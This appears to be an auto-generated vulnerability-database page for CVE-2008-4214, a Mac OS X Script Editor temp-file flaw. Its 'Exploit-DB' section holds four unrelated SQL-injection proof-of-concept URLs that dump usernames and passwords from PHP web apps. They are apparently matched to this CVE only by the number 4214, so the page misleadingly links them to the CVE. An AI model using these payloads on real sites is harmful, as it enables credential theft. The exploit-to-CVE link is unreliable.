CVE-2008-4214
published 2008-10-10CVE-2008-4214: Unspecified vulnerability in Script Editor in Mac OS X 10.4.11 and 10.5.5 allows local users to cause the scripting dictionary to be written to arbitrary…
PriorityP415medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EPSS
0.32%
24.2th percentile
Unspecified vulnerability in Script Editor in Mac OS X 10.4.11 and 10.5.5 allows local users to cause the scripting dictionary to be written to arbitrary locations, related to an "insecure file operation" on temporary files.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
W2B Dating Club - 'browse.php' SQL Injection
exploitdb·2008-04-11
CVE-2008-1843 W2B Dating Club - 'browse.php' SQL Injection
W2B Dating Club - 'browse.php' SQL Injection
---
source: https://www.securityfocus.com/bid/28737/info
W2B Dating Club is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects unknown versions of Dating Club; we will update this BID when more details become available.
http://www.example.com/[path]/browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-4214/**/union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body
Exploit-DB
W2B PHPHotResources - 'cat.php' SQL Injection
exploitdb·2008-04-11
CVE-2008-1844 W2B PHPHotResources - 'cat.php' SQL Injection
W2B PHPHotResources - 'cat.php' SQL Injection
---
source: https://www.securityfocus.com/bid/28736/info
W2B phpHotResources is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects unknown versions of phpHotResources; we will update this BID when more details become available.
http://www.example.com/[path]/cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9+from+users/*
Exploit-DB
Mambo Component com_Musica - 'id' SQL Injection
exploitdb·2008-03-01
CVE-2008-6234 Mambo Component com_Musica - 'id' SQL Injection
Mambo Component com_Musica - 'id' SQL Injection
---
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
Shoutz : AurA, imm02tal, Kinglet, iM4N, & All our staff
Mambo com_Musica "id" Remote SQL Injection
index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*
Original Link:
http://forum.aria-security.net/showthread.php?t=588
Regards,
The-0utl4w
# milw0rm.com [2008-03-01]
Exploit-DB
Dynamic photo Gallery 1.02 - 'albumID' SQL Injection
exploitdb·2008-03-01
CVE-2008-1162 Dynamic photo Gallery 1.02 - 'albumID' SQL Injection
Dynamic photo Gallery 1.02 - 'albumID' SQL Injection
---
Aria-Security Team
http://Aria-Security.Net
Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff
Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php
Original Link: http://forum.aria-security.net/showthread.php?p=1521
PoC:
album.php?slideshow=start&albumID=-4214/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/users
Regards
The-0utl4w
# milw0rm.com [2008-03-01]
No writeups or analysis indexed.
http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.htmlhttp://secunia.com/advisories/32222http://support.apple.com/kb/HT3216http://www.securityfocus.com/bid/31681http://www.securityfocus.com/bid/31716http://www.securitytracker.com/id?1021029http://www.vupen.com/english/advisories/2008/2780https://exchange.xforce.ibmcloud.com/vulnerabilities/45786http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.htmlhttp://secunia.com/advisories/32222http://support.apple.com/kb/HT3216http://www.securityfocus.com/bid/31681http://www.securityfocus.com/bid/31716http://www.securitytracker.com/id?1021029http://www.vupen.com/english/advisories/2008/2780https://exchange.xforce.ibmcloud.com/vulnerabilities/45786
2008-10-10
Published